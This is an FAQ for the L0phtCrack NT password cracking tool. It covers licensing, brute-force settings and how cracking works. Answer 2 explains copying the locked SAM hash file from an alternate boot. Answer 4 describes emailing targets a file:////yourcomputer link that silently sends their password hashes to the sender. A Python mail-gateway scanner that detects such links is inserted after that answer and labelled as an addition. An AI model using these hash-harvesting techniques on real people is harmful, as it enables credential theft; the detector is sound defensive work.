1. Can I use a custom character set for brute forcing?
Yes. Just enter the character set you want into the Tools Options dialog
box in the Character Set field. It will be saved with the file you are
cracking if you decide to stop and start cracking.
2. How do I get the SAM file? It seems locked.
The SAM file in \winnt\system32\config is locked by the OS so that it
cannot be read while NT is running. In order to read this file you will
need to boot an alternate operating system such as Linux or DOS. Usually
this file will be on an NTFS partition. Linux can read NTFS natively but
DOS will need a special program to access the partition. Go to
www.sysinternals.com and download NTFSDOS. It will allow you to boot off
a DOS floppy, run NTFSDOS, and copy files from an NTFS partition. You
can now copy the SAM file and bring it to the machine running L0phtCrack
to be imported.
2. Cracking sniffer dumps seems to take a long time. Is this right?
Cracking the captured challenge/response hashes from a network capture
takes a bit longer for one password than its counterpart gotten from a
registry dump. The big slowdown with the network capture cracking is that
each hash is encrypted with a unique challenge so that the work done
cracking one password cannot be used again to crack another. This means
that the time to completion scales linearly as you add password hashes to
crack.
10 network challenge/response hashes will take 10 times longer to crack
than just one. Ouch, that could take a long time. This type of cracking
really needs to be targeted towards particular passwords to be
effective. We estimate network challenge/response cracking to take 10
times longer than normal password hash cracking.
3. I get "cannot open network device or do not have sufficient
privileges to install packet driver." What's wrong?
You need to have administrator privileges to do network sniffing. Or at
least you have to have an administrator run L0phtCrack and choose SMB
Network Capture once to have the packet driver installed.
4. I am on a switched network and can't capture anyone else's password
hashes. Am I out of luck?
No. You just have to make the hashes come to you. Send out an email to
your target, whether it is an individual or a whole company. Include in
it a URL in the form of
file:////yourcomputer/sharename/message.html. When people click on that
URL they will be sending their password hashes to you for authentication.
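A mail-gateway check for the link form described in answer 4, as an added
example that is not part of the original FAQ or of L0phtCrack: it flags
file: URLs and UNC paths in a message body that name a remote host. The
function names and the sample message are constructed for illustration.

```python
import re
from email import message_from_string
from urllib.parse import unquote

# file: URL: capture the run of slashes and the first segment after it.
FILE_URL = re.compile(r"""file:(/+)([^/\s"'<>]*)""", re.I)
# Raw UNC path such as \\host\share\file
UNC_PATH = re.compile(r"""\\\\([\w.-]+)\\[^\s"'<>]+""")
LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}

def remote_file_hosts(text):
    """Return hosts that a file: URL or UNC path in text would contact."""
    text = unquote(text)  # also catch percent-encoded slashes
    hosts = []
    for m in FILE_URL.finditer(text):
        slashes, first = len(m.group(1)), m.group(2).lower()
        # file:/path and file:///path are local; 2 or 4+ slashes name a host.
        if slashes in (1, 3) or first in LOCAL_HOSTS:
            continue
        hosts.append(first)
    hosts.extend(m.group(1).lower() for m in UNC_PATH.finditer(text))
    return hosts

def scan_message(raw):
    """Scan every text part of an RFC 822 message; return unique hosts."""
    found = []
    for part in message_from_string(raw).walk():
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True) or b""
        body = payload.decode(part.get_content_charset() or "utf-8", "replace")
        found.extend(remote_file_hosts(body))
    return sorted(set(found))

# Constructed sample message: one remote link, one harmless local link.
SAMPLE = """\
From: someone@example.test
To: user@example.test
Subject: constructed sample
Content-Type: text/html; charset=utf-8

<p>Read <a href="file:////yourcomputer/sharename/message.html">this</a></p>
<p>Help: <a href="file:///C:/docs/readme.html">readme</a></p>
"""

if __name__ == "__main__":
    print(scan_message(SAMPLE))
```

A mail gateway could quarantine messages for which scan_message returns a
non-empty list. Blocking outbound SMB at the network edge covers the same
exposure for links that arrive by other means.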
5. I am using an international version of NT and L0phtCrack crashes,
hangs, produces an error, fails to crack my password etc. What am I doing
wrong?
This is mentioned in the Read Me file but we still get this question a
lot. If you use a non-English language version of NT you will need to
modify the registry with regedit so that you can dump the password
hashes from the registry. The registry key to modify is:
HKEY_CURRENT_USER\Software\L0pht\L0phtCrack\AdminGroupName
The default is "administrators". Change this to your language version for
the administrators group.
6. I would like to move my license to a new machine but the unlock
code does not work on the new system. What do I do?
I have had to reinstall all of my software and now my unlock code does
not work. What do I do?
The serial number/unlock code pair is machine specific and will vary
from system to system. To move your license from one machine to another
follow these steps.
1. Delete your copy of L0phtCrack from the old system.
2. Download and install a new copy onto the new machine.
3. Email us with the new serial number and your customer ID code.
4. We will email you the appropriate unlock code.
7. I tried to use L0phtCrack on my AOL, Hotmail, ISP, MS Word,
FileMaker Pro, etc. etc... password but it didn't work. What am I doing
wrong?
(You would be surprised how often we get asked this.) L0phtCrack is for
auditing Windows NT passwords only. The current version does not work on
any other types of passwords. Due to the increased demand for this sort of
functionality we may add these features in the future, so keep checking
back.
8. Is L0phtCrack Y2K compliant?
L0phtCrack does not use any time or date specific functions. Therefore,
as long as the underlying operating system is compliant so is
L0phtCrack.
9. I keep getting NULL Passwords in the cracked password file. I
know these accounts have passwords. Why is L0phtCrack showing them as
NULL?
Machine accounts that cannot be used for login have NULL passwords.
User accounts that last had their password changed under MacOS,
Novell, WinFrame, etc... will have NULL NT passwords.